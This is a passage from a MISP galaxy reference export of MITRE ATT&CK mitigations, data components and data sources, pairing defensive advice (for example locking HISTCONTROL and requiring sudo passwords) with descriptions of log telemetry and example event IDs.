Table 6712. Table References

Links

https://attack.mitre.org/mitigations/T1154

HISTCONTROL Mitigation - T1148

Prevent users from changing the HISTCONTROL environment variable (Citation: Securing bash history). Also, make sure that the HISTCONTROL environment variable is set to “ignoredup” instead of “ignoreboth” or “ignorespace”.

The tag is: misp-galaxy:mitre-course-of-action="HISTCONTROL Mitigation - T1148"

HISTCONTROL Mitigation - T1148 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="HISTCONTROL - T1148" with estimative-language:likelihood-probability="almost-certain"

Table 6713. Table References

Links

http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory

https://attack.mitre.org/mitigations/T1148

Defacement Mitigation - T1491

Implementing best practices for websites such as defending against [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) (Citation: OWASP Top 10 2017). Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. (Ready.gov IT DRP) Ensure backups are stored off system and are protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

The tag is: misp-galaxy:mitre-course-of-action="Defacement Mitigation - T1491"

Table 6714. Table References

Links

https://attack.mitre.org/mitigations/T1491

https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/

AppleScript Mitigation - T1155

Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing (Citation: applescript signing). This subjects AppleScript code to the same scrutiny as other .app files passing through Gatekeeper.

The tag is: misp-galaxy:mitre-course-of-action="AppleScript Mitigation - T1155"

AppleScript Mitigation - T1155 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="AppleScript - T1155" with estimative-language:likelihood-probability="almost-certain"

Table 6715. Table References

Links

https://attack.mitre.org/mitigations/T1155

https://www.engadget.com/2013/10/23/applescript-and-automator-gain-new-features-in-os-x-mavericks/

Sudo Mitigation - T1169

The sudoers file should be strictly edited such that passwords are always required and that users can’t spawn risky processes as users with higher privilege. By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file.

The tag is: misp-galaxy:mitre-course-of-action="Sudo Mitigation - T1169"

Sudo Mitigation - T1169 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Sudo - T1169" with estimative-language:likelihood-probability="almost-certain"

Table 6716. Table References

Links

https://attack.mitre.org/mitigations/T1169

Hooking Mitigation - T1179

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all hooking will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

The tag is: misp-galaxy:mitre-course-of-action="Hooking Mitigation - T1179"

Hooking Mitigation - T1179 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Hooking - T1179" with estimative-language:likelihood-probability="almost-certain"

Table 6717. Table References

Links

https://attack.mitre.org/mitigations/T1179

Pre-compromise - M1056

This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.

The tag is: misp-galaxy:mitre-course-of-action="Pre-compromise - M1056"

Table 6718. Table References

Links

https://attack.mitre.org/mitigations/M1056

Antivirus/Antimalware - M1049

Use signatures or heuristics to detect malicious software.

The tag is: misp-galaxy:mitre-course-of-action="Antivirus/Antimalware - M1049"

Table 6719. Table References

Links

https://attack.mitre.org/mitigations/M1049

Antivirus/Antimalware - M1058

Mobile security products, such as Mobile Threat Defense (MTD), offer various device-based mitigations against certain behaviors.

The tag is: misp-galaxy:mitre-course-of-action="Antivirus/Antimalware - M1058"

Table 6720. Table References

Links

https://attack.mitre.org/mitigations/M1058

Attestation - M1002

Enable remote attestation capabilities when available (such as Android SafetyNet or Samsung Knox TIMA Attestation) and prohibit devices that fail the attestation from accessing enterprise resources.

The tag is: misp-galaxy:mitre-course-of-action="Attestation - M1002"

Attestation - M1002 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1398" with estimative-language:likelihood-probability="almost-certain"

Table 6721. Table References

Links

https://attack.mitre.org/mitigations/M1002

Audit - M1047

Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.

The tag is: misp-galaxy:mitre-course-of-action="Audit - M1047"

Table 6722. Table References

Links

https://attack.mitre.org/mitigations/M1047

mitre-data-component

Data components are parts of data sources.

mitre-data-component is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Active Directory Object Access

Opening of an active directory object, typically to collect/read its value (ex: Windows EID 4661)

The tag is: misp-galaxy:mitre-data-component="Active Directory Object Access"

Table 6723. Table References

Links

Active Directory Object Creation

Initial construction of a new active directory object (ex: Windows EID 5137)

The tag is: misp-galaxy:mitre-data-component="Active Directory Object Creation"

Table 6724. Table References

Links

Active Directory Credential Request

A user requested active directory credentials, such as a ticket or token (ex: Windows EID 4769)

The tag is: misp-galaxy:mitre-data-component="Active Directory Credential Request"

Table 6725. Table References

Links

Active Directory Object Deletion

Removal of an active directory object (ex: Windows EID 5141)

The tag is: misp-galaxy:mitre-data-component="Active Directory Object Deletion"

Table 6726. Table References

Links

Active Directory Object Modification

Changes made to an active directory object (ex: Windows EID 5163 or 5136)

The tag is: misp-galaxy:mitre-data-component="Active Directory Object Modification"

Table 6727. Table References

Links

Windows Registry Key Access

Opening a Registry Key, typically to read the associated value (ex: Windows EID 4656)

The tag is: misp-galaxy:mitre-data-component="Windows Registry Key Access"

Table 6728. Table References

Links

Windows Registry Key Creation

Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12)

The tag is: misp-galaxy:mitre-data-component="Windows Registry Key Creation"

Table 6729. Table References

Links

Windows Registry Key Deletion

Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12)

The tag is: misp-galaxy:mitre-data-component="Windows Registry Key Deletion"

Table 6730. Table References

Links

Windows Registry Key Modification

Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)

The tag is: misp-galaxy:mitre-data-component="Windows Registry Key Modification"

Table 6731. Table References

Links

User Account Authentication

An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log)

The tag is: misp-galaxy:mitre-data-component="User Account Authentication"

Table 6732. Table References

Links

Application Log Content

Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications)

The tag is: misp-galaxy:mitre-data-component="Application Log Content"

Table 6733. Table References

Links

Cloud Storage Access

Opening of a cloud storage infrastructure, typically to collect/read its value (ex: AWS S3 GetObject)

The tag is: misp-galaxy:mitre-data-component="Cloud Storage Access"

Table 6734. Table References

Links

User Account Creation

Initial construction of a new account (ex: Windows EID 4720 or /etc/passwd logs)

The tag is: misp-galaxy:mitre-data-component="User Account Creation"

Table 6735. Table References

Links

User Account Deletion

Removal of an account (ex: Windows EID 4726 or /var/log access/authentication logs)

The tag is: misp-galaxy:mitre-data-component="User Account Deletion"

Table 6736. Table References

Links

OS API Execution

Operating system function/method calls executed by a process

The tag is: misp-galaxy:mitre-data-component="OS API Execution"

Table 6737. Table References

Links

User Account Metadata

Contextual data about an account, which may include a username, user ID, environmental data, etc.

The tag is: misp-galaxy:mitre-data-component="User Account Metadata"

Table 6738. Table References

Links

User Account Modification

Changes made to an account, such as permissions and/or membership in specific groups (ex: Windows EID 4738 or /var/log access/authentication logs)

The tag is: misp-galaxy:mitre-data-component="User Account Modification"

Table 6739. Table References

Links

Network Share Access

Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)

The tag is: misp-galaxy:mitre-data-component="Network Share Access"

Table 6740. Table References

Links

Network Connection Creation

Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)

The tag is: misp-galaxy:mitre-data-component="Network Connection Creation"

Table 6741. Table References

Links

Cloud Storage Creation

Initial construction of new cloud storage infrastructure (ex: AWS S3 CreateBucket)

The tag is: misp-galaxy:mitre-data-component="Cloud Storage Creation"

Table 6742. Table References

Links

Web Credential Creation

Initial construction of new web credential material (ex: Windows EID 1200 or 4769)

The tag is: misp-galaxy:mitre-data-component="Web Credential Creation"

Table 6743. Table References

Links

Cloud Service Disable

Deactivation or stoppage of a cloud service (ex: AWS Cloudtrail StopLogging)

The tag is: misp-galaxy:mitre-data-component="Cloud Service Disable"

Table 6744. Table References

Links

Cloud Storage Deletion

Removal of cloud storage infrastructure (ex: AWS S3 DeleteBucket)

The tag is: misp-galaxy:mitre-data-component="Cloud Storage Deletion"

Table 6745. Table References

Links

Cloud Storage Enumeration

An extracted list of cloud storage infrastructure (ex: AWS S3 ListBuckets or ListObjects)

The tag is: misp-galaxy:mitre-data-component="Cloud Storage Enumeration"

Table 6746. Table References

Links

Cloud Service Enumeration

An extracted list of cloud services (ex: AWS ECS ListServices)

The tag is: misp-galaxy:mitre-data-component="Cloud Service Enumeration"

Table 6747. Table References

Links

Scheduled Job Creation

Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs)

The tag is: misp-galaxy:mitre-data-component="Scheduled Job Creation"

Table 6748. Table References

Links

Logon Session Creation

Initial construction of a successful new user logon following an authentication attempt (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wtmp)

The tag is: misp-galaxy:mitre-data-component="Logon Session Creation"

Table 6749. Table References

Links

Cloud Storage Metadata

Contextual data about cloud storage infrastructure and activity around it such as name, size, or owner

The tag is: misp-galaxy:mitre-data-component="Cloud Storage Metadata"

Table 6750. Table References

Links

Cloud Service Metadata

Contextual data about a cloud service and activity around it such as name, type, or purpose/function

The tag is: misp-galaxy:mitre-data-component="Cloud Service Metadata"

Table 6751. Table References

Links

Cloud Storage Modification

Changes made to cloud storage infrastructure, including its settings and/or data (ex: AWS S3 PutObject or PutObjectAcl)

The tag is: misp-galaxy:mitre-data-component="Cloud Storage Modification"

Table 6752. Table References

Links

Cloud Service Modification

Changes made to a cloud service, including its settings and/or data (ex: AWS CloudTrail DeleteTrail or DeleteConfigRule)

The tag is: misp-galaxy:mitre-data-component="Cloud Service Modification"

Table 6753. Table References

Links

Network Traffic Content

Logged network traffic data showing both protocol header and body values (ex: PCAP)

The tag is: misp-galaxy:mitre-data-component="Network Traffic Content"

Table 6754. Table References

Links

Web Credential Usage

An attempt by a user to gain access to a network or computing resource by providing web credentials (ex: Windows EID 1202)

The tag is: misp-galaxy:mitre-data-component="Web Credential Usage"

Table 6755. Table References

Links

Firewall Rule Modification

Changes made to a firewall rule, typically to allow/block specific network traffic (ex: Windows EID 4950 or Write/Delete entries within Azure Firewall Rule Collection Activity Logs)

The tag is: misp-galaxy:mitre-data-component="Firewall Rule Modification"

Table 6756. Table References

Links

Network Traffic Flow

Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)

The tag is: misp-galaxy:mitre-data-component="Network Traffic Flow"

Table 6757. Table References

Links

Scheduled Job Metadata

Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.

The tag is: misp-galaxy:mitre-data-component="Scheduled Job Metadata"

Table 6758. Table References

Links

Scheduled Job Modification

Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs)

The tag is: misp-galaxy:mitre-data-component="Scheduled Job Modification"

Table 6759. Table References

Links

Kernel Module Load

An object file that contains code to extend the running kernel of an OS, typically used to add support for new hardware (as device drivers) and/or filesystems, or for adding system calls

The tag is: misp-galaxy:mitre-data-component="Kernel Module Load"

Table 6760. Table References

Links

Logon Session Metadata

Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it

The tag is: misp-galaxy:mitre-data-component="Logon Session Metadata"

Table 6761. Table References

Links

Named Pipe Metadata

Contextual data about a named pipe on a system, including pipe name and creating process (ex: Sysmon EIDs 17-18)

The tag is: misp-galaxy:mitre-data-component="Named Pipe Metadata"

Table 6762. Table References

Links

API Calls

API calls utilized by an application that could indicate malicious activity

The tag is: misp-galaxy:mitre-data-component="API Calls"

Table 6763. Table References

Links

Active DNS

Queried domain name system (DNS) registry data highlighting current domain to IP address resolutions (ex: dig/nslookup queries)

The tag is: misp-galaxy:mitre-data-component="Active DNS"

Table 6764. Table References

Links

Drive Access

Opening of a data storage device with an assigned drive letter or mount point

The tag is: misp-galaxy:mitre-data-component="Drive Access"

Table 6765. Table References

Links

File Access

Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)

The tag is: misp-galaxy:mitre-data-component="File Access"

Table 6766. Table References

Links

Process Access

Opening of a process by another process, typically to read memory of the target process (ex: Sysmon EID 10)

The tag is: misp-galaxy:mitre-data-component="Process Access"

Table 6767. Table References

Links

Container Creation

Initial construction of a new container (ex: docker create <container_name>)

The tag is: misp-galaxy:mitre-data-component="Container Creation"

Table 6768. Table References

Links

Drive Creation

Initial construction of a drive letter or mount point to a data storage device

The tag is: misp-galaxy:mitre-data-component="Drive Creation"

Table 6769. Table References

Links

Container Enumeration

An extracted list of containers (ex: docker ps)

The tag is: misp-galaxy:mitre-data-component="Container Enumeration"

Table 6770. Table References

Links

Command Execution

The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc.)

The tag is: misp-galaxy:mitre-data-component="Command Execution"

Table 6771. Table References

Links

File Creation

Initial construction of a new file (ex: Sysmon EID 11)

The tag is: misp-galaxy:mitre-data-component="File Creation"

Table 6772. Table References

Links

WMI Creation

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

The tag is: misp-galaxy:mitre-data-component="WMI Creation"

Table 6773. Table References

Links

Instance Creation

Initial construction of a new instance (ex: instance.insert within GCP Audit Logs)

The tag is: misp-galaxy:mitre-data-component="Instance Creation"

Table 6774. Table References

Links

Image Creation

Initial construction of a virtual machine image (ex: Azure Compute Service Images PUT)

The tag is: misp-galaxy:mitre-data-component="Image Creation"

Table 6775. Table References

Links

Container Metadata

Contextual data about a container and activity around it such as name, ID, image, or status

The tag is: misp-galaxy:mitre-data-component="Container Metadata"

Table 6776. Table References

Links

Cluster Metadata

Contextual data about a cluster and activity around it such as name, namespace, age, or status

The tag is: misp-galaxy:mitre-data-component="Cluster Metadata"

Table 6777. Table References

Links

Malware Content

Code, strings, and other signatures that comprise a malicious payload

The tag is: misp-galaxy:mitre-data-component="Malware Content"

Table 6778. Table References

Links

Network Communication

Network requests made by an application or domains contacted

The tag is: misp-galaxy:mitre-data-component="Network Communication"

Table 6779. Table References

Links

Protected Configuration

Device configuration options that are not typically utilized by benign applications

The tag is: misp-galaxy:mitre-data-component="Protected Configuration"

Table 6780. Table References

Links

Process Creation

The initial construction of an executable managed by the OS, which may involve one or more tasks or threads (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)

The tag is: misp-galaxy:mitre-data-component="Process Creation"

Table 6781. Table References

Links

Pod Creation

Initial construction of a new pod (ex: kubectl apply|run)

The tag is: misp-galaxy:mitre-data-component="Pod Creation"

Table 6782. Table References

Links

Certificate Registration

Queried or logged information highlighting current and expired digital certificates (ex: Certificate transparency)

The tag is: misp-galaxy:mitre-data-component="Certificate Registration"

Table 6783. Table References

Links

Response Content

Logged network traffic in response to a scan showing both protocol header and body values

The tag is: misp-galaxy:mitre-data-component="Response Content"

Table 6784. Table References

Links

Snapshot Creation

Initial construction of a new snapshot (ex: AWS create-snapshot)

The tag is: misp-galaxy:mitre-data-component="Snapshot Creation"

Table 6785. Table References

Links

Container Start

Activation or invocation of a container (ex: docker start or docker restart)

The tag is: misp-galaxy:mitre-data-component="Container Start"

Table 6786. Table References

Links

Service Creation

Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)

The tag is: misp-galaxy:mitre-data-component="Service Creation"

Table 6787. Table References

Links

Volume Creation

Initial construction of a cloud volume (ex: AWS create-volume)

The tag is: misp-galaxy:mitre-data-component="Volume Creation"

Table 6788. Table References

Links

Firewall Disable

Deactivation or stoppage of a cloud service (ex: Write/Delete entries within Azure Firewall Activity Logs)

The tag is: misp-galaxy:mitre-data-component="Firewall Disable"

Table 6789. Table References

Links

File Deletion

Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)

The tag is: misp-galaxy:mitre-data-component="File Deletion"

Table 6790. Table References

Links

Instance Deletion

Removal of an instance (ex: instance.delete within GCP Audit Logs)

The tag is: misp-galaxy:mitre-data-component="Instance Deletion"

Table 6791. Table References

Links

Image Deletion

Removal of a virtual machine image (ex: Azure Compute Service Images DELETE)

The tag is: misp-galaxy:mitre-data-component="Image Deletion"

Table 6792. Table References

Links

Driver Load

Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6)

The tag is: misp-galaxy:mitre-data-component="Driver Load"

Table 6793. Table References

Links

Driver Metadata

Contextual data about a driver and activity around it such as driver issues reporting or integrity (page hash, code) checking

The tag is: misp-galaxy:mitre-data-component="Driver Metadata"

Table 6794. Table References

Links

Drive Modification

Changes made to a drive letter or mount point of a data storage device

The tag is: misp-galaxy:mitre-data-component="Drive Modification"

Table 6795. Table References

Links

Passive DNS

Logged domain name system (DNS) data highlighting timelines of domain to IP address resolutions (ex: passive DNS)

The tag is: misp-galaxy:mitre-data-component="Passive DNS"

Table 6796. Table References

Links

Domain Registration

Information about domain name assignments and other domain metadata (ex: WHOIS)

The tag is: misp-galaxy:mitre-data-component="Domain Registration"

Table 6797. Table References

Links

Snapshot Deletion

Removal of a snapshot (ex: AWS delete-snapshot)

The tag is: misp-galaxy:mitre-data-component="Snapshot Deletion"

Table 6798. Table References

Links

Volume Deletion

Removal of a cloud volume (ex: AWS delete-volume)

The tag is: misp-galaxy:mitre-data-component="Volume Deletion"

Table 6799. Table References

Links

Firewall Enumeration

An extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands)

The tag is: misp-galaxy:mitre-data-component="Firewall Enumeration"

Table 6800. Table References

Links

Group Enumeration

An extracted list of available groups and/or their associated settings (ex: AWS list-groups)

The tag is: misp-galaxy:mitre-data-component="Group Enumeration"

Table 6801. Table References

Links

Instance Enumeration

An extracted list of instances within a cloud environment (ex: instance.list within GCP Audit Logs)

The tag is: misp-galaxy:mitre-data-component="Instance Enumeration"

Table 6802. Table References

Links

Pod Enumeration

An extracted list of pods within a cluster (ex: kubectl get pods)

The tag is: misp-galaxy:mitre-data-component="Pod Enumeration"

Table 6803. Table References

Links

Snapshot Enumeration

An extracted list of snapshots within a cloud environment (ex: AWS describe-snapshots)

The tag is: misp-galaxy:mitre-data-component="Snapshot Enumeration"

Table 6804. Table References

Links

Script Execution

The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.)

The tag is: misp-galaxy:mitre-data-component="Script Execution"

Table 6805. Table References

Links

Volume Enumeration

An extracted list of available volumes within a cloud environment (ex: AWS describe-volumes)

The tag is: misp-galaxy:mitre-data-component="Volume Enumeration"

Table 6806. Table References

Links

Firewall Metadata

Contextual data about a firewall and activity around it such as name, policy, or status

The tag is: misp-galaxy:mitre-data-component="Firewall Metadata"

Table 6807. Table References

Links

File Metadata

Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

The tag is: misp-galaxy:mitre-data-component="File Metadata"

Table 6808. Table References

Links

Firmware Modification

Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record)

The tag is: misp-galaxy:mitre-data-component="Firmware Modification"

Table 6809. Table References

Links

File Modification

Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)

The tag is: misp-galaxy:mitre-data-component="File Modification"

Table 6810. Table References

Links

Group Metadata

Contextual data about a group and activity around it, such as name, permissions, or user accounts within the group

The tag is: misp-galaxy:mitre-data-component="Group Metadata"

Table 6811. Table References

Links

Group Modification

Changes made to a group, such as membership, name, or permissions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup)

The tag is: misp-galaxy:mitre-data-component="Group Modification"

Table 6812. Table References

Links

Host Status

Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)

The tag is: misp-galaxy:mitre-data-component="Host Status"

Table 6813. Table References

Links

Instance Metadata

Contextual data about an instance and activity around it such as name, type, or status

The tag is: misp-galaxy:mitre-data-component="Instance Metadata"

Table 6814. Table References

Links

Image Metadata

Contextual data about a virtual machine image such as name, resource group, state, or type

The tag is: misp-galaxy:mitre-data-component="Image Metadata"

Table 6815. Table References

Links

Instance Modification

Changes made to an instance, including its settings and/or control data (ex: instance.addResourcePolicies or instances.setMetadata within GCP Audit Logs)

The tag is: misp-galaxy:mitre-data-component="Instance Modification"

Table 6816. Table References

Links

Image Modification

Changes made to a virtual machine image, including setting and/or control data (ex: Azure Compute Service Images PATCH)

The tag is: misp-galaxy:mitre-data-component="Image Modification"

Table 6817. Table References

Links

Instance Start

Activation or invocation of an instance (ex: instance.start within GCP Audit Logs)

The tag is: misp-galaxy:mitre-data-component="Instance Start"

Table 6818. Table References

Links

Instance Stop

Deactivation or stoppage of an instance (ex: instance.stop within GCP Audit Logs)

The tag is: misp-galaxy:mitre-data-component="Instance Stop"

Table 6819. Table References

Links

Module Load

Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)

The tag is: misp-galaxy:mitre-data-component="Module Load"

Table 6820. Table References

Links

Malware Metadata

Contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information

The tag is: misp-galaxy:mitre-data-component="Malware Metadata"

Table 6821. Table References

Links

Process Metadata

Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.

The tag is: misp-galaxy:mitre-data-component="Process Metadata"

Table 6822. Table References

Links

Pod Metadata

Contextual data about a pod and activity around it such as name, ID, namespace, or status

The tag is: misp-galaxy:mitre-data-component="Pod Metadata"

Table 6823. Table References

Links

Process Modification

Changes made to a process, or its contents, typically to write and/or execute code in the memory of the target process (ex: Sysmon EID 8)

The tag is: misp-galaxy:mitre-data-component="Process Modification"

Table 6824. Table References

Links

Pod Modification

Changes made to a pod, including its settings and/or control data (ex: kubectl set|patch|edit)

The tag is: misp-galaxy:mitre-data-component="Pod Modification"

Table 6825. Table References

Links

Response Metadata

Contextual data about an Internet-facing resource gathered from a scan, such as running services or ports

The tag is: misp-galaxy:mitre-data-component="Response Metadata"

Table 6826. Table References

Links

Snapshot Metadata

Contextual data about a snapshot, which may include information such as ID, type, and status

The tag is: misp-galaxy:mitre-data-component="Snapshot Metadata"

Table 6827. Table References

Links

Service Metadata

Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.

The tag is: misp-galaxy:mitre-data-component="Service Metadata"

Table 6828. Table References

Links

Social Media

Established, compromised, or otherwise acquired social media personas

The tag is: misp-galaxy:mitre-data-component="Social Media"

Table 6829. Table References

Links

Snapshot Modification

Changes made to a snapshot, such as metadata and control data (ex: AWS modify-snapshot-attribute)

The tag is: misp-galaxy:mitre-data-component="Snapshot Modification"

Table 6830. Table References

Links

Service Modification

Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)

The tag is: misp-galaxy:mitre-data-component="Service Modification"

Table 6831. Table References

Links

Volume Metadata

Contextual data about a cloud volume and activity around it, such as id, type, state, and size

The tag is: misp-galaxy:mitre-data-component="Volume Metadata"

Table 6832. Table References

Links

Volume Modification

Changes made to a cloud volume, including its settings and control data (ex: AWS modify-volume)

The tag is: misp-galaxy:mitre-data-component="Volume Modification"

Table 6833. Table References

Links

System Notifications

Notifications generated by the OS

The tag is: misp-galaxy:mitre-data-component="System Notifications"

Table 6834. Table References

Links

Permissions Requests

Permissions declared in an application’s manifest or property list file

The tag is: misp-galaxy:mitre-data-component="Permissions Requests"

Table 6835. Table References

Links

Permissions Request

System prompts triggered when an application requests new or additional permissions

The tag is: misp-galaxy:mitre-data-component="Permissions Request"

Table 6836. Table References

Links

Process Termination

Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)

The tag is: misp-galaxy:mitre-data-component="Process Termination"

Table 6837. Table References

Links

System Settings

Settings visible to the user on the device

The tag is: misp-galaxy:mitre-data-component="System Settings"

Table 6838. Table References

Links

mitre-data-source

Data sources represent the various subjects/topics of information that can be collected by sensors/logs.

mitre-data-source is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Cloud Storage - DS0010

Data object storage infrastructure hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)

The tag is: misp-galaxy:mitre-data-source="Cloud Storage - DS0010"

Table 6839. Table References

Links

https://attack.mitre.org/datasources/DS0010

https://aws.amazon.com/s3/

https://azure.microsoft.com/en-us/services/storage/blobs/

https://cloud.google.com/storage

User Account - DS0002

A profile representing a user, device, service, or application used to authenticate and access resources

The tag is: misp-galaxy:mitre-data-source="User Account - DS0002"

Table 6840. Table References

Links

https://attack.mitre.org/datasources/DS0002

Scheduled Job - DS0003

Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)

The tag is: misp-galaxy:mitre-data-source="Scheduled Job - DS0003"

Table 6841. Table References

Links

https://attack.mitre.org/datasources/DS0003

https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks

Malware Repository - DS0004

Information obtained (via shared or submitted samples) regarding malicious software (droppers, backdoors, etc.) used by adversaries

The tag is: misp-galaxy:mitre-data-source="Malware Repository - DS0004"

Table 6842. Table References

Links

https://attack.mitre.org/datasources/DS0004

Web Credential - DS0006

Credential material, such as session cookies or tokens, used to authenticate to web applications and services(Citation: Medium Authentication Tokens)(Citation: Auth0 Access Tokens)

The tag is: misp-galaxy:mitre-data-source="Web Credential - DS0006"

Table 6843. Table References

Links

https://attack.mitre.org/datasources/DS0006

https://auth0.com/docs/tokens/access-tokens

https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4

Sensor Health - DS0013

Information from host telemetry providing insights about system status, errors, or other notable functional activity

The tag is: misp-galaxy:mitre-data-source="Sensor Health - DS0013"

Table 6844. Table References

Links

https://attack.mitre.org/datasources/DS0013

Application Vetting - DS0041

Application vetting report generated by an external cloud service.

The tag is: misp-galaxy:mitre-data-source="Application Vetting - DS0041"

Table 6845. Table References

Links

https://attack.mitre.org/datasources/DS0041

Application Log - DS0015

Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)

The tag is: misp-galaxy:mitre-data-source="Application Log - DS0015"

Table 6846. Table References

Links

https://attack.mitre.org/datasources/DS0015

https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html

Named Pipe - DS0023

Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it(Citation: Microsoft Named Pipes)

The tag is: misp-galaxy:mitre-data-source="Named Pipe - DS0023"

Table 6847. Table References

Links

https://attack.mitre.org/datasources/DS0023

https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes

User Interface - DS0042

Visual activity on the device that could alert the user to potentially malicious behavior.

The tag is: misp-galaxy:mitre-data-source="User Interface - DS0042"

Table 6848. Table References

Links

https://attack.mitre.org/datasources/DS0042

Windows Registry - DS0024

A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)

The tag is: misp-galaxy:mitre-data-source="Windows Registry - DS0024"

Table 6849. Table References

Links

https://attack.mitre.org/datasources/DS0024

https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry

Cloud Service - DS0025

Infrastructure, platforms, or software that are hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon AWS)(Citation: Azure Products)

The tag is: misp-galaxy:mitre-data-source="Cloud Service - DS0025"

Table 6850. Table References

Links

https://attack.mitre.org/datasources/DS0025

https://aws.amazon.com

https://azure.microsoft.com/en-us/services/

Active Directory - DS0026

A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)(Citation: Microsoft AD DS Getting Started)

The tag is: misp-galaxy:mitre-data-source="Active Directory - DS0026"

Table 6851. Table References

Links

https://attack.mitre.org/datasources/DS0026

https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started

Logon Session - DS0028

Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events)

The tag is: misp-galaxy:mitre-data-source="Logon Session - DS0028"

Table 6852. Table References

Links

https://attack.mitre.org/datasources/DS0028

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events

Network Traffic - DS0029

Data transmitted across a network (ex: Web, DNS, Mail, File, etc.) that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)

The tag is: misp-galaxy:mitre-data-source="Network Traffic - DS0029"

Table 6853. Table References

Links

https://attack.mitre.org/datasources/DS0029

Network Share - DS0033

A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)

The tag is: misp-galaxy:mitre-data-source="Network Share - DS0033"

Table 6854. Table References

Links

https://attack.mitre.org/datasources/DS0033

https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview

Internet Scan - DS0035

Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet

The tag is: misp-galaxy:mitre-data-source="Internet Scan - DS0035"

Table 6855. Table References

